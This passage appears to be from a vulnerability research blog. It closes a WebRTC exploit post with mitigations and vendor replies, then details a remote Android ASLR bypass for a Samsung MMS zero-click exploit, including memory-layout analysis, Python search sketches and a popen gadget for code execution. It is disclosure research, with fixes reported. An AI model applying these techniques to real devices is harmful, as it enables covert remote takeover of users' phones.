Application design affects the risk posed by WebRTC, and many applications researched were designed well. The easiest, and most important way to limit the security impact of WebRTC is to avoid starting the WebRTC connection until the callee has accepted the call by interacting with the device. This turns an exploit that can compromise any user quickly into an exploit that requires user interaction, and won’t be successful on every target. It also makes lower quality vulnerabilities not practically exploitable, because while a fully remote exploit can be attempted many times without the user noticing, an exploit that requires a user to answer a call needs to work in a small number of tries.

Starting the WebRTC connection late has a performance impact, and precludes certain features, like giving the callee a preview of the call. Of the applications that the exploit worked on, two started the connection without user interaction, and two required user interaction. JioChat and the application we are not yet identifying tried to use unique tricks to delay the connection until the user accepted the call without performance impact, but introduced vulnerabilities as a result. Developers should be aware that the best way to delay a WebRTC connection is to avoid calling setRemoteDescription until the user has accepted the call.  Other methods might not actually delay the connection and can cause other security problems.

Another way to reduce the security risk of WebRTC is to limit who an attacker can call, for example by requiring that the callee have the user in their contact list, or only allowing calls between users that have agreed to be able to message each other in the application. Like delaying the connection, this greatly reduces the targets an attacker can reach without a lot of effort.

Finally, integrators should limit the features of WebRTC an attacker can use to the features the application needs. Many applications were not vulnerable to this specific exploit because they had effectively disabled SCTP. Others did not use SCTP, but did not disable it in a way that prevented attackers from using it, and I was able to enable it. The best way to disable a feature in WebRTC is to remove it at compile time, which is supported for certain codecs. It is also possible to disable certain features through the PeerConnection and PeerConnectionFactory, and this is also very effective. Features can also be disabled by filtering SDP, but it is important to make sure that the filter is robust and tested thoroughly.

Conclusion

I wrote an exploit for WebRTC for Android involving two vulnerabilities in usrsctp. This exploit was fully remote on Signal, Google Duo, JioChat and one other application, and required user interaction on VK, OK and TamTam. Seven other messengers were not affected because they effectively disabled SCTP. Several applications used versions of WebRTC that did not include patches for either of the vulnerabilities used in the exploit. One remains unpatched. Low patch uptake is partially a result of WebRTC historically providing poor patching guidance. Integrators can reduce the risk of WebRTC by requiring user interaction to start a WebRTC connection, limiting who users can call easily and disabling unused features. They should also consider whether video conferencing is an important and necessary feature of their application.

Vendor Response

The software vendors mentioned in this blog post were given a chance to review this post before it was posted publicly, and some provided responses, as follows.

WebRTC

The WebRTC bug that was used both to bypass ASLR and move the instruction pointer has been fixed. WebRTC no longer passes the SctpTransport pointer directly into usrsctp, using an opaque identifier that is mapped to a SctpTransport instead, with invalid values being ignored. We have identified and patched every affected Google product and reached out to 50 applications and integrators using WebRTC, including all applications analyzed in this post. For all applications and integrators who have not yet patched the vulnerability, we recommend updating to the WebRTC M85 branch, or patching the following two commits: 1, 2.

Mail.ru

User security is of the highest priority for all Mail.ru Group products, which include VK, OK, TamTam and others. Acting on the information we received regarding the vulnerability, we immediately started the process of updating our mobile apps to the latest version of WebRTC. This update is currently underway. We have also implemented algorithms on our servers that no longer allow this vulnerability to be exploited in our products. This action allowed us to fix the issue for all of our users within 3 hours of receiving the information with an exploit demonstration.

Signal

We appreciate the effort that went into finding these bugs and improving the security of the WebRTC ecosystem. Signal had already shipped a defensive patch that protected users from this exploit prior to its discovery. In addition to routine updates of our calling libraries, we continue to take proactive steps to mitigate the impact of future WebRTC bugs.

Slack

We're pleased to see that this report concludes that Slack is not impacted by the referenced WebRTC vulnerabilities and exploits. Upon learning about this risk, we undertook additional diligence and confirmed that the entirety of our Calls service is not impacted by the vulnerabilities and findings described here.

MMS Exploit Part 5: Defeating Android ASLR, Getting RCE

12 August 2020 at 17:28
By: Ben
Posted by Mateusz Jurczyk, Project Zero

This post is the fifth and final of a multi-part series capturing my journey from discovering a vulnerable little-known Samsung image codec, to completing a remote zero-click MMS attack that worked on the latest Samsung flagship devices. Previous posts are linked below:


Furthermore, with this last post, I have uploaded the source code of the MMS exploit to GitHub and the bug tracker. I hope it will serve as a useful reference while reading this blog, and help bootstrap further research in the area of MMS security.

Introduction

Up until this point in the story, I have managed to construct a reliable ASLR oracle delivered via MMS. It works by taking advantage of a buffer overflow to corrupt an android::Bitmap object on the heap and trigger a read from a controlled address, and abuses MMS delivery reports to transmit the oracle output (crash or lack thereof) back to the attacker. In fact, the oracle conveniently makes it possible to test the readability of an arbitrary memory range, not just a single address. On the other hand, due to the crash handling logic on Android, the queries must be sent at least one minute apart from each other, which severely limits the data throughput of the already restricted communication channel.

The current goal is to take the 1-bit information disclosure, and use it to build a high level algorithm capable of remotely leaking full 64-bit addresses in an acceptable number of steps. The acceptability criterion is hard to define precisely, since in real life, it would mostly depend on the tolerable exploit run time specified by the malicious actor. The general rule of thumb is "the fewer, the better", but for the purpose of the exercise, I aimed to design an exploit running in a maximum of 8 × 60 = 480 oracle queries (and, consequently, roughly 480 minutes). This corresponds to the average user's night sleep, and seemed like a plausible attack scenario for a zero-click MMS exploit.

There are two major aspects of defeating ASLR: what do we leak and how do we leak it. As disconnected as they might seem, the two elements are actually closely related. It might not matter which parts of the process address space we intend to use, if they don't overlap with what we can realistically find in memory. With that in mind, I decided to start by familiarizing myself with the typical address space of the com.samsung.android.messaging process, and the overall state of ASLR on Android 10. This would hopefully give me an understanding of some of its weaknesses (if any), and ideally some ideas for bypassing the mitigation. From the outset, the only thing I knew for a fact was the Zygote design, which guaranteed persistent addresses across different instances of a crashing app, and was a crucial part of the attack. I learned the rest mostly by experimenting with a rooted Galaxy Note 10+ phone, as outlined in the sections below.

Android memory layout

Throughout this blog post, we'll be analyzing the Messages memory map found in the /proc/pid/maps pseudo-file. When we look at a few different maps (obtained by rebooting the phone several times to re-randomize the memory layout), we can immediately notice that a majority of mappings, including all shared objects, reside somewhere between 0x6f00000000 and 0x8000000000, with a few exceptions:

  • Mappings of .art, .oat and .vdex files under /system/framework, and some Dalvik-related regions in the low 4 GB of the address space.
  • An isolated mapping of the /system/bin/app_process64 ELF somewhere between 0x5500000000 and 0x6500000000.

Neither of these cases seems particularly interesting right now, although we might want to go back to the low 32-bit mappings if we don't have any success with the higher regions. In general, the usual suspects for leaking (heap areas, libc.so, libhwui.so, …) are all located between 0x6f00000000 - 0x8000000000, which adds up to an effective randomization range of 68 GB. In other words, that's over 24 bits of entropy, a number that is certainly not very encouraging on its own. However, let's not despair just yet and instead let's look closer at how the mappings are laid out in the address space.

We could continue manually inspecting the maps files to look for more insights, but I found that staring at thousands of hexadecimal addresses was not an effective way to reason about the memory layout. As a fan of memory visualization, I wrote a quick Python script to convert a textual maps file to a 2048x8704 bitmap, where each pixel represented one 4 kB page and the color denoted its state and access rights:

  • black for unmapped pages
  • gray for mapped no-access pages
  • green for read-only pages
  • blue for read/write pages
  • red for execute-only pages

Converting three random memory layouts of the Messages process yielded the following results:

Example Android 10 memory layouts

ASLR definitely works, as all memory is mapped at different addresses across reboots. On the other hand, the entropy of the mappings relative to each other is rather low, as they seem to be packed very close together in the scope of each memory map. Furthermore, they add up to a relatively large memory area compared to the 68 GB randomization space. There is one huge continuous read-only (green) memory mapping that particularly stands out:

745c6ea000-745c6ed000 r--p 00000000 00:00 0          [anon:cfi shadow]
745c6ed000-745c6ee000 r--p 00000000 00:00 0          [anon:cfi shadow]
745c6ee000-745c9b3000 r--p 00000000 00:00 0          [anon:cfi shadow]
745c9b3000-745c9b4000 r--p 00000000 00:00 0          [anon:cfi shadow]
745c9b4000-745ca89000 r--p 00000000 00:00 0          [anon:cfi shadow]
745ca89000-745ca8a000 r--p 00000000 00:00 0          [anon:cfi shadow]
745ca8a000-745ca8b000 r--p 00000000 00:00 0          [anon:cfi shadow]
745ca8b000-745ca8c000 r--p 00000000 00:00 0          [anon:cfi shadow]
745ca8c000-745ca8d000 r--p 00000000 00:00 0          [anon:cfi shadow]
745ca8d000-745ca90000 r--p 00000000 00:00 0          [anon:cfi shadow]
745ca90000-745ca91000 r--p 00000000 00:00 0          [anon:cfi shadow]
745ca91000-745ca92000 r--p 00000000 00:00 0          [anon:cfi shadow]
745ca92000-74dc6ea000 r--p 00000000 00:00 0          [anon:cfi shadow]

This is an auxiliary memory region for Control Flow Integrity (CFI), a security mitigation enabled in Android user-mode code since version 8 and in kernel-mode since Android 9 (source). As explained in the documentation, the shadow area stores information that helps locate the special __cfi_check function for each code page of a CFI-enabled library or executable. There are 2 bytes of metadata reserved for each page in the address space, and the overall CFI shadow spans 2 GB of memory (for instance in the layout above, 0x74dc6ea000 - 0x745c6ea000 = 0x80000000). This means that there is always a continuous 2 GB chunk of memory somewhere in the total 68 GB search space, and other interesting mappings are located in its direct vicinity.

Because the shadow area is readable, it is detectable with our existing ASLR oracle. We can find it by running a linear search of the address space in 2 GB intervals, and once a readable page is detected, by checking if 1 GB directly before or after it is readable too. This logic will deterministically find a valid address inside the CFI shadow in between 2 and 36 oracle queries (plus potentially one or two for some failed 1 GB checks). From an attacker's perspective, this is fantastic news, as it makes it possible to identify an approximate location of data and code in a very reasonable run time.
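
To make the description more concrete, here is a minimal sketch of the search, assuming an oracle(addr, length) primitive that returns whether the whole range is readable (how that primitive is built on top of the crashing MMS messages is outside the scope of the snippet):

# Sketch: find a readable address inside the 2 GB CFI shadow with a coarse linear scan.
GB = 1 << 30
LOW, HIGH = 0x6f00000000, 0x8000000000   # effective randomization range

def find_cfi_shadow(oracle):
    addr = LOW
    while addr < HIGH:
        # Probe one page every 2 GB; at least one probe must land inside the shadow.
        if oracle(addr, 0x1000):
            # Confirm by checking a full 1 GB directly after or before the hit.
            if oracle(addr, GB) or oracle(addr - GB, GB):
                return addr
        addr += 2 * GB
    return None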

Knowing some readable address is already big progress, but it isn't readily usable yet. However, thanks to the fact that our oracle can probe entire memory ranges, we can use a simple binary search algorithm to determine the beginning or end of any readable area in around log2(n) steps, where n is the maximum expected size of the region in 4 kB pages. For a 2 GB region, that's a fixed number of 19 iterations, so the total number of queries needed to find the bounds of the CFI shadow is between 21 and 55.
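
A sketch of that binary search, built on the same assumed oracle(addr, length) primitive and operating at page granularity (readable_addr is assumed to be page-aligned), might look like this:

# Sketch: binary search for the end of the readable region containing readable_addr.
PAGE = 0x1000

def find_region_end(oracle, readable_addr, max_size=2 << 30):
    lo, hi = 0, max_size // PAGE              # number of readable pages after readable_addr
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(readable_addr, (mid + 1) * PAGE):
            lo = mid + 1                      # at least mid+1 pages are readable
        else:
            hi = mid
    return readable_addr + lo * PAGE          # first non-readable page boundary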

Ironically, CFI is not even enabled for the libhwui.so library that we're exploiting, so while it is technically a mitigation, it worked solely in the attacker's favor in this case. This is not to say that CFI or other defense-in-depth mechanisms are bad to begin with, but rather that they should be carefully designed and scrutinized for regressions that might bring their overall security impact down to a net negative. This specific CFI weakness was fixed by defaulting to PROT_NONE as the access rights of the unused parts of the shadow (more than 99% of its space), and it will ship in a future version of Android. For a somewhat related read on the subject of mitigation (in)security, please see Jann Horn's "Mitigations are attack surface, too" post on the Project Zero blog.

Finding initial cheap exploit gadgets – linker64

Now that we can establish the start and end of the 2 GB CFI region, we should use the information to disclose the base addresses of some nearby libraries. When I inspected the memory maps on my test phone, I noticed that a fixed set of 168 modules was persistently mapped at addresses higher than the shadow, and 54 modules below it. All libraries that I was potentially interested in leaking (e.g. libhwui.so, libc.so) were placed within 128 MB from the end of the CFI shadow, so I decided to focus on that area. Let's zoom in on the three unique memory layouts visualized earlier in this post:

Visualization of the 128 MB of memory after CFI shadow

There aren't too many similarities between these three layouts, and in hindsight, this is expected as the library load order has been randomized in the Android linker since 2015. As a result, there aren't any constant library offsets relative to the CFI shadow that we could readily use. Nonetheless, one region has an exceptionally low variance between all three memory layouts – the bottom green stripe separated from the rest of the libraries with a large non-readable gap (marked in gray):

A memory region with particularly low randomization entropy

What is it?

733e63b000-733e643000 rw-p 00000000 00:00 0       [anon:thread signal stack]
733e643000-733e644000 rw-p 00000000 00:00 0       [anon:arc4random data]
733e644000-733e645000 rw-p 00000000 00:00 0       [anon:Allocate]
733e645000-733e646000 r--p 00000000 00:00 0       [anon:atexit handlers]
733e646000-733e647000 rw-p 00000000 00:00 0       [anon:arc4random data]
733e647000-733e648000 r--p 00000000 00:00 0       [vvar]
733e648000-733e649000 r-xp 00000000 00:00 0       [vdso]
733e649000-733e681000 r--p 00000000 103:09 216    /system/bin/linker64
733e681000-733e752000 r-xp 00038000 103:09 216    /system/bin/linker64
733e752000-733e753000 rw-p 00109000 103:09 216    /system/bin/linker64
733e753000-733e75a000 r--p 0010a000 103:09 216    /system/bin/linker64
733e75a000-733e761000 rw-p 00000000 00:00 0 
733e761000-733e762000 r--p 00000000 00:00 0 
733e762000-733e764000 rw-p 00000000 00:00 0 

As it turns out, it is not one mapping but several adjacent Linux internal regions, with a bulk of the address range taken up by the /apex/com.android.runtime/bin/linker64 module (linked to by /system/bin/linker64). It is the interpreter used by other dynamically linked executables, equivalent to /lib64/ld-linux-x86-64.so.2 on Linux x64:

d2s:/system/bin $ file app_process64
app_process64: ELF shared object, 64-bit LSB arm64, dynamic (/system/bin/linker64)
d2s:/system/bin $

The fact that linker64 is the first ELF loaded in memory by the kernel explains its low address entropy relative to the CFI shadow – it is not subject to the same load order randomization as other libraries. The question is, is it useful for exploitation?

In the firmware of my test Note 10+ device (February 2020 patch level), the linker64 file is 1.52 MB in size. If we open it in IDA Pro (or your favorite disassembler) and browse the functions list, we can immediately spot a number of routines that could be chained together or used on their own to achieve arbitrary code execution. For example, there is a generic __dl_syscall function for invoking system calls, wrappers for specific syscalls operating on files and memory (e.g. __dl_open64, __dl_read, __dl_write, __dl_mmap64, __dl_mprotect), and even functions for starting new processes such as __dl_execl, __dl_execle, __dl_execve, and __dl_execvpe. However, the absolute number one is the __dl_popen function with the following definition:

FILE* popen(const char* cmd, const char* mode);

For all intents and purposes of the attacker, the routine is equivalent to libc's system() in that it executes arbitrary shell commands. The only notable difference is that it also accepts a second argument that has to be a valid, readable pointer. Otherwise, they're essentially the same, which means that we likely won't have to locate libc.so or similar libraries in memory, as linker64 already provides plenty of practical exploitation gadgets. If you're curious how __dl_popen even made its way into linker64, it's through convertMonotonic defined in system/core/liblog/logprint.cpp (called by __dl_android_log_formatLogLine), which uses the function to parse dmesg output:

Decompiled code of the convertMonotonic function

Now that we know we are interested in leaking linker64, we should figure out how many oracle queries it will take. To find a precise answer, I used my test device to generate a corpus of 4000 unique memory maps, which should be a statistically significant sample size for running various kinds of analyses. Within that corpus, the offset of the linker64 base relative to the end of the CFI shadow ranged between 107.94 MB and 108.80 MB, so less than 1 MB of variance. If we also account for any readable regions directly adjacent to the CFI shadow, which cannot be distinguished from the shadow memory by our oracle, the distance to linker64 ranged from 104.05 MB to 108.40 MB. Just to add a bit of versatility in my exploit, I implemented the search starting from a round 100 MB offset from the CFI end.

The logic of identifying linker64 in memory is as follows: we probe a single page in 1088 kB intervals (the span of linker64 in the address space), and when we encounter a readable one, we check if there is a 544 kB accessible region to the right or left of the page – if that's the case, we found some address inside the ELF. We then use the binary search algorithm again, which takes exactly 9 iterations to determine the end of the readable area. After subtracting the size of the module and the few pages of adjacent memory (0x11B000 in total) from the resulting address, we get the base address of linker64.
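
A sketch of this step, reusing the assumed oracle() primitive and the find_region_end() helper from the earlier snippets (the interval constants mirror the description above, and the 128 MB upper bound is an arbitrary safety margin of mine):

# Sketch: locate the linker64 base relative to the leaked end of the CFI shadow.
MB, KB, PAGE = 1 << 20, 1 << 10, 0x1000
LINKER64_SPAN = 0x11B000                       # linker64 plus the few adjacent pages

def find_linker64(oracle, cfi_end):
    addr = cfi_end + 100 * MB
    while addr < cfi_end + 128 * MB:           # arbitrary upper bound for the sketch
        if oracle(addr, PAGE):
            # Require 544 kB of accessible memory on one side of the hit.
            if oracle(addr, 544 * KB) or oracle(addr - 544 * KB, 544 * KB):
                end = find_region_end(oracle, addr, max_size=1088 * KB)
                return end - LINKER64_SPAN     # linker64 base address
        addr += 1088 * KB
    return None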

With this logic, my testing indicates that the leaking of CFI shadow + linker64 takes between 38 and 75 oracle queries, with an average of 56.45 queries on the memory maps corpus mentioned before. This translates to around 40-80 minutes of exploit run time, which is quite acceptable so far.

Locating libhwui.so in memory

At this point in the research, I spent some time trying to complete the attack based solely on the linker64 base address. The key piece of the puzzle was a suitable gadget function which had to meet the following conditions:

  • Had its address stored somewhere in the static memory of the module, such that we could point the fake vtable of the android::Bitmap object there and trigger a call to the function.
  • Called a function pointer loaded from the first argument, preferably with parameters that were either controlled or pointed to controlled data.

Unfortunately I didn't manage to find any applicable gadgets during my brief manual analysis, but I don't rule out the possibility that they exist and perhaps could be recognized with a more automated approach. This is left as an open challenge to the reader, and I'll be very interested to learn how RCE can be achieved with the help of linker64 alone.

As we can remember from Part 3, it is possible to call a controlled function pointer with two arbitrary arguments by corrupting the android::Bitmap.mPixelStorage.external structure fields. The only requirement is that we must know the base address of libhwui.so, to restore the Bitmap vtable pointer to its original value in the linear buffer overflow. And so, I started contemplating how the specific library could be efficiently recognized among all the other 168 shared objects loaded in random order within ~100 MB of the CFI shadow. I turned my eyes to the memory visualization bitmaps again.

For simplicity, let's eliminate blue from the color palette of the memory map (previously used for rw- mappings), and use green for all kinds of readable pages (incl. r--, rw- and r-x). This is closer to how the ASLR oracle "sees" memory, and it should make it easier to understand the layout of memory we're operating on:

The oracle's view of the 128 MB address range after CFI shadow

The numerous red regions in the bitmap are not inaccessible PROT_NONE mappings, but rather they are sections of code with the "r" bit off:

74dd777000-74dd9a3000 r--p 00000000 103:09 4238    /system/lib64/libhwui.so
74dd9a3000-74ddf3c000 --xp 0022c000 103:09 4238    /system/lib64/libhwui.so
74ddf3c000-74ddf41000 rw-p 007c5000 103:09 4238    /system/lib64/libhwui.so
74ddf41000-74ddf69000 r--p 007ca000 103:09 4238    /system/lib64/libhwui.so
[...]
74de900000-74de92a000 r--p 00000000 103:09 4575    /system/lib64/libvintf.so
74de92a000-74de978000 --xp 0002a000 103:09 4575    /system/lib64/libvintf.so
74de978000-74de979000 rw-p 00078000 103:09 4575    /system/lib64/libvintf.so
74de979000-74de97e000 r--p 00079000 103:09 4575    /system/lib64/libvintf.so

The nonstandard memory rights are caused by a new Execute Only Memory (XOM) mitigation introduced in Android 10. Unfortunately, similarly to the CFI shadow, the mitigation doesn't interfere with our exploit in any way and instead makes the exploitation considerably easier. That's because every library in memory is now fragmented into three parts:

  • A readable area used by .rodata, .eh_frame and similar segments.
  • A non-readable area for the .text and .plt segments.
  • A readable area for sections such as .data and .bss.

The middle non-readable part creates an observable gap of a fixed size, which can be successfully used to fingerprint libraries in memory. To make things even worse, this is especially easy for libhwui.so, because it is by far the largest shared object loaded in the address space, spanning 7.94 MB split into: 2.17 MB (readable), 5.59 MB (execute-only), 180 kB (readable). In the memory map above, it is easy to spot as the single biggest continuous chunk of red color:

Representation of libhwui.so in the memory visualization above

Thanks to XOM, the question is not if we can find libhwui.so, but how efficiently we can find it. Let's consider our options.

Memory scanning algorithm #1 – basic search over mapped regions

To reiterate our working assumptions, the goal is to quickly and accurately identify the 7.94 MB libhwui.so mapping within ~100 MB of the end of CFI shadow. The first algorithm that I tested was very simple:

  • Check the readability of one page in 2.17 MB intervals, such that we always test a page inside the first readable libhwui.so region of that size.
  • If the page is readable, find the end of the accessible region with binary search: let's call it X.
  • Test if the surrounding memory looks like our library:
    • oracle(X - 2.17 MB, 2.17 MB) == True
    • oracle(X + 5.59 MB - 4 kB, 4 kB) == False
    • oracle(X + 5.59 MB, 180 kB) == True
  • If all conditions are met, we have a candidate for libhwui.so.

For fully reliable output, the algorithm collects all candidates over the 100 MB area, and if there is more than one at the end of the scan, it makes additional queries to check non-readability at random offsets of the suspected .text sections, until a single candidate remains. However, since the heuristics used to find the candidates are already quite strong, we might cut some corners and just return the first candidate we encounter, hoping it's the correct address. This is what I call "light mode", and in my research, I've tested both modes of operation of each algorithm to compare their accuracy and performance against my memory map corpus.
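
As a rough illustration, the light-mode variant could be sketched as follows, reusing the assumed oracle() and find_region_end() primitives from earlier; the segment sizes are the approximate figures quoted above, rounded to pages, not the exact values from the firmware:

# Sketch of algorithm #1 in light mode: return the first libhwui.so candidate found.
MB, KB, PAGE = 1 << 20, 1 << 10, 0x1000
RO_HEAD  = (int(2.17 * MB) // PAGE) * PAGE     # readable prologue of libhwui.so
XOM_TEXT = (int(5.59 * MB) // PAGE) * PAGE     # execute-only .text, unreadable to the oracle
RO_TAIL  = 180 * KB                            # readable epilogue (.data/.bss)

def find_libhwui_basic(oracle, cfi_end, search_size=100 * MB):
    for addr in range(cfi_end, cfi_end + search_size, RO_HEAD):
        if not oracle(addr, PAGE):
            continue
        x = find_region_end(oracle, addr)                  # end of the readable region
        if (oracle(x - RO_HEAD, RO_HEAD) and               # readable prologue before X
                not oracle(x + XOM_TEXT - PAGE, PAGE) and  # gap still unreadable at its end
                oracle(x + XOM_TEXT, RO_TAIL)):            # readable epilogue after the gap
            return x - RO_HEAD                             # approximate libhwui.so base
    return None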

Let's look at the numbers of our initial algorithm:

Algorithm #1           Light mode           Full mode
Min. oracle queries    14                   256
Max. oracle queries    370                  427
Avg. oracle queries    162.90               370.15
Accuracy               99.1% (3964/4000)    100% (4000/4000)

For a first idea, that's not a terrible outcome – especially in light mode, the number of queries and the accuracy are somewhat acceptable. The 0.9% error rate is caused by the fact that we don't verify the non-readability of the whole 5.59 MB .text section, and we only know that it's non-readable at the beginning and end. This may lead to false positives if other libraries are laid out in memory so unfavorably that they produce a mapping boundary at the offset we are testing for. The full mode mitigates the problem, but at the cost of more than doubling the average number of needed queries, which doesn't seem worth the extra 0.9% accuracy. It is probably more effective to just add a few more random checks of the .text segment to light mode, which would still retain its heuristic nature, but could reduce the error rate to a negligible percentage.

Now that we have a general idea of what the libhwui.so detection algorithm may look like, let's see if we can make any substantial improvements.

Memory scanning algorithm #2 – forward page sampling

In the previous algorithm, we spent 9 iterations in each binary search to find the end of a region, and we invoked it for each of up to 100 ÷ 2.17 ~= 46 readable pages we could have encountered during the scan. This is very wasteful, because most locations in memory look nothing like libhwui.so, and we can quickly disqualify them as candidates without involving the costly operation. The key is to better utilize the fact that we are looking for a huge 5.59 MB continuous non-readable region, whereas most of the search space is actually readable.

Specifically, we will continue sampling pages in 2.17 MB intervals, but instead of treating every readable page as a valid lead to follow up on, we will only act on a series of [1, 0, 0] oracle results. This is how libhwui.so will manifest itself in the sampling output, since the 2.17 MB readable prologue will generate exactly one "1", and the 5.59 MB gap will produce at least two 0's. The three final conditions verified for each candidate in algorithm #1 remain the same here. Of course, the light mode of this improved method is still prone to false positives, but the error rate should be lower because we're verifying two additional offsets in the non-readable range. Furthermore, the algorithm should be more effective, since we're performing the same amount of sampling but much fewer binary searches. Let's see if this is reflected in the numbers of my memory maps data set:

Algorithm #2           Light mode            Full mode
Min. oracle queries    16                    71
Max. oracle queries    120                   143
Avg. oracle queries    44.90                 92.25
Accuracy               99.925% (3997/4000)   100% (4000/4000)

Indeed, both the accuracy of the light mode and the oracle query counts have greatly improved. We can now locate libhwui.so with almost full confidence in an average of ~45 iterations, which is a very satisfying result. Combined with the avg. 56.45 queries needed to leak the end of CFI shadow and linker64 base address, it adds up to ~100 queries statistically needed to execute the attack, which is well within the bounds of my initial objective (<480 queries total).
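
For completeness, here is a minimal sketch of the sampling variant in light mode, under the same assumptions and with the same constants as the algorithm #1 sketch above:

# Sketch of algorithm #2 in light mode: sample pages and only act on a [1, 0, 0] run.
def find_libhwui_sampling(oracle, cfi_end, search_size=100 * MB):
    samples = []
    for idx, addr in enumerate(range(cfi_end, cfi_end + search_size, RO_HEAD)):
        samples.append(1 if oracle(addr, PAGE) else 0)
        if idx >= 2 and samples[idx - 2:idx + 1] == [1, 0, 0]:
            # Follow up on the page that produced the leading "1" with the same
            # three checks as in algorithm #1.
            hit = cfi_end + (idx - 2) * RO_HEAD
            x = find_region_end(oracle, hit)
            if (oracle(x - RO_HEAD, RO_HEAD) and
                    not oracle(x + XOM_TEXT - PAGE, PAGE) and
                    oracle(x + XOM_TEXT, RO_TAIL)):
                return x - RO_HEAD                         # approximate libhwui.so base
    return None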

The algorithm in this shape was used in the recording of the Galaxy Note 10+ exploit demo video in April 2020, with a minor difference of using 2 MB sampling intervals instead of 2.17 MB. Since then, I have come up with some further optimizations that I will discuss in the section below.

Memory scanning algorithm #3 – the Boyer-Moore optimization

If we think about it, our algorithm currently spends most of the time performing a kind of string searching of the [1, 0, 0] pattern over a sampled view of the address space. In the process, we linearly obtain the values of all consecutive samples until a match is found. But perhaps we could borrow some ideas from classic string searching algorithms to reduce the number of comparisons, and thus the number of pages needed to be sampled, too?

One idea that I had was to run the matching starting from the "tail" (last value) of the pattern and iterating backwards, instead of starting from the head. This is a concept found in the Boyer-Moore algorithm, and it improves the computational complexity by making it possible to "skip along the text in jumps of multiple characters rather than searching every single character in the text". This is especially true for a pattern of the form N × [1] + M × [0], such as [1, 0, 0]. For instance, if there is a mismatch on the last value of the pattern, we know for sure that there won't be a match at offset 0 (currently tested) or 1, and we can resume the search from offset 2, completely skipping an extra offset in the text.

Let's demonstrate this on an example:

Sampled memory map (gaps mark pages that the algorithm never had to query):

1  1  0  1  _  1  _  1  _  1  0  0

Pattern matching process: the [1, 0, 0] pattern is compared against the samples tail-first at successive candidate positions, and each early mismatch lets the search jump ahead by more than one position, until the pattern finally matches on the last three samples.
As we can see, thanks to the multi-offset jumps enabled by early mismatches in the tail of the text, 5 out of 14 locations in the sampled memory map were never touched by the algorithm, and their values didn't have to be determined by the ASLR oracle. In this case, it is a 35% reduction of the number of necessary oracle queries, and the effect of the optimization can be further amplified by decreasing the sampling interval to some extent, thus making the searched pattern longer. The fact that most of the search space contains readable regions contributes to its success, as the tail comparisons tend to fail early, leading to large jumps skipping broad ranges of memory.
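
A minimal sketch of this tail-first matching with a bad-character style shift rule, assuming a probe(i) callback that asks the oracle about the page at sample index i, could look as follows:

# Sketch: tail-first pattern matching over the sampled memory view, caching samples
# so that no page is ever queried twice.
def find_pattern(probe, pattern, num_samples):
    cache = {}
    def sample(i):
        if i not in cache:
            cache[i] = probe(i)
        return cache[i]

    m = len(pattern)
    pos = 0
    while pos + m <= num_samples:
        j = m - 1
        while j >= 0 and sample(pos + j) == pattern[j]:
            j -= 1                        # compare from the tail backwards
        if j < 0:
            return pos                    # full match found
        bad = sample(pos + j)
        # Rightmost position to the left of j where the mismatching value occurs.
        k = max((i for i in range(j) if pattern[i] == bad), default=-1)
        pos += j - k                      # skip ahead; always at least 1
    return None

# e.g. find_pattern(probe, [1, 0, 0], num_samples) for the example above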

I implemented the optimization in my exploit and experimented with various configurations, to finally conclude that the most efficient setting was a 1 MB sampling interval and a [1, 1, 0, 0, 0, 0, 0] oracle pattern. It was measured to have the following performance:

Algorithm #3           Light mode           Full mode
Min. oracle queries    19                   38
Max. oracle queries    64                   88
Avg. oracle queries    29.63                58.90
Accuracy               100% (4000/4000)     100% (4000/4000)

In my opinion, that's a solid result. In comparison to algorithm #2, the maximum number of queries was reduced 120 → 64, the average queries decreased by 34% (44.90 → 29.63), and the light mode accuracy reached 100%, making it virtually indistinguishable from the full mode. I think it's a good time to wrap up the work on the libhwui.so leaking logic, but if you have any further ideas for improvement, I'm all ears!

Putting the ASLR bypass together

We can now combine the CFI shadow, libhwui.so and linker64 disclosure logic and run some final benchmarks on the code. In my testing, the final exploit takes between 45 and 129 oracle queries to calculate the two library base addresses, with an average of 85.91 requests. Assuming that the heap buffer overflow is very (99%+) reliable, and every query is only made once, this is equivalent to around 1 – 2.5 hours of run time. An animation illustrating the end-to-end process of a remote ASLR bypass is shown below:


It's worth noting that the animation depicts the exact same queries that were made in the original exploit demo recorded in April, so it's based on the slightly slower algorithm #2. The usage of the optimized algorithm #3 would further reduce the number of necessary queries for this memory layout from 86 down to 75.

Moving on to RCE

As discussed in Part 3, knowing the locations of libhwui.so and linker64 allows us to redirect the Bitmap vtable to any function pointer found in the static memory of these modules, or call any of their functions directly with two controlled arguments, by corrupting the android::Bitmap.mPixelStorage.external structure. The simplest way forward would be to call the __dl_popen routine with a shell command to execute, but that requires us to pass an address of our own ASCII string, which we currently don't know. I have briefly looked for ways to inject controlled data into the static memory of libhwui.so as a side effect of some multimedia decoding, but I failed to identify such a primitive.

Of course, the current capabilities at our disposal are so strong that completing the attack should be a formality. Since we can trigger x(y,z) calls where x, y and z are all controlled 64-bit values, we could find a write-what-where code gadget and use it twice in a row to set up a minimalistic 16-byte reverse shell command in some writable memory region. This could certainly work, but it would require the android::Bitmap overflow to succeed three times in a row (twice for the write-what-where and once for the RCE trigger) without any app restarts in between, which seemed to be a risk to the reliability of the exploit. I had hoped to achieve remote code execution in just a single MMS, but how do we do it without any clue as to the location of our data in memory?

One idea would be to have a pointer to our data passed as the first argument of the hijacked function call, without explicitly knowing or leaking the value of the address. Let's see if this could be applied to the mPixelStorage.external structure with a partial overflow, and how it overlaps with the legitimately used heap structure within the encompassing mPixelStorage union:

    struct {
      /* +0x80 */ void*  address;
      /* +0x88 */ size_t size;
    } heap;

    struct {
      /* +0x80 */ void*    address;
      /* +0x88 */ void*    context;
      /* +0x90 */ FreeFunc freeFunc;
    } external;

Conveniently, heap.address points to the bitmap pixel buffer and it overlaps with external.address, the first parameter passed to external.freeFunc. On the other hand, with the linear overflow we're using, it is impossible to modify external.freeFunc without first destroying the values of external.address and external.context. Does it mean that the whole idea is doomed to fail? Not at all, but it will require slightly more heap grooming than originally expected.

Calling functions with a string argument

Overall, I have discovered two different methods to pass string parameters to arbitrary functions – one during the initial exploit development in April 2020, and the second, admittedly a simpler one, while writing this blog post in July. :) I will briefly discuss both of them below. If you wish to follow along, you can use the reference android::Bitmap corruption Qmage sample shared on my GitHub.

Technique #1 – an uninitialized freeFunc pointer

